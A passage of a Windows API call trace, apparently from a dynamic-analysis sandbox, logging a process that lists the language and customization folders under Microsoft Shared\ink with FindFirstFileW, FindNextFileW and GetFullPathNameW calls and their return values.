dwReserved1=0x0, cFileName="webbase.xml", cAlternateFileName="")) returned 1 [0046.318] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x0, dwReserved1=0x0, cFileName="webbase.xml", cAlternateFileName="")) returned 0 [0046.318] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.319] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpFilePart=0x0) returned 0x38 [0046.319] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.350] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.350] CoTaskMemFree (pv=0x4fe370) [0046.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpFilePart=0x0) returned 0x38 [0046.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.351] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpFilePart=0x0) returned 0x38 [0046.351] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", lpFilePart=0x0) returned 0x39 [0046.351] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.351] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.351] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.352] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.352] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpFilePart=0x0) returned 0x38 [0046.352] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\", lpFilePart=0x0) returned 0x39 [0046.352] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.352] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2bbf40b, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2dd4721, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2dd4721, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.353] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.353] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpFilePart=0x0) returned 0x38 [0046.353] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.353] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.353] CoTaskMemFree (pv=0x4fe370) [0046.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.353] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpFilePart=0x0) returned 0x38 [0046.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.353] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpFilePart=0x0) returned 0x38 [0046.353] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", lpFilePart=0x0) returned 0x39 [0046.357] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.358] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.358] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.358] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.358] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.358] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.359] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", lpFilePart=0x0) returned 0x38 [0046.359] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", lpFilePart=0x0) returned 0x39 [0046.359] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.359] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.359] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.359] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpFilePart=0x0) returned 0x38 [0046.360] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.360] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.360] CoTaskMemFree (pv=0x4fe370) [0046.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.360] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpFilePart=0x0) returned 0x38 [0046.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.360] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpFilePart=0x0) returned 0x38 [0046.360] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", lpFilePart=0x0) returned 0x39 [0046.360] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.361] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.361] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", lpFilePart=0x0) returned 0x38 [0046.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", lpFilePart=0x0) returned 0x39 [0046.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.362] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.362] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpFilePart=0x0) returned 0x43 [0046.362] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.362] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.362] CoTaskMemFree (pv=0x4fe370) [0046.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpFilePart=0x0) returned 0x43 [0046.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.363] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpFilePart=0x0) returned 0x43 [0046.363] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\", lpFilePart=0x0) returned 0x44 [0046.363] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.382] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, 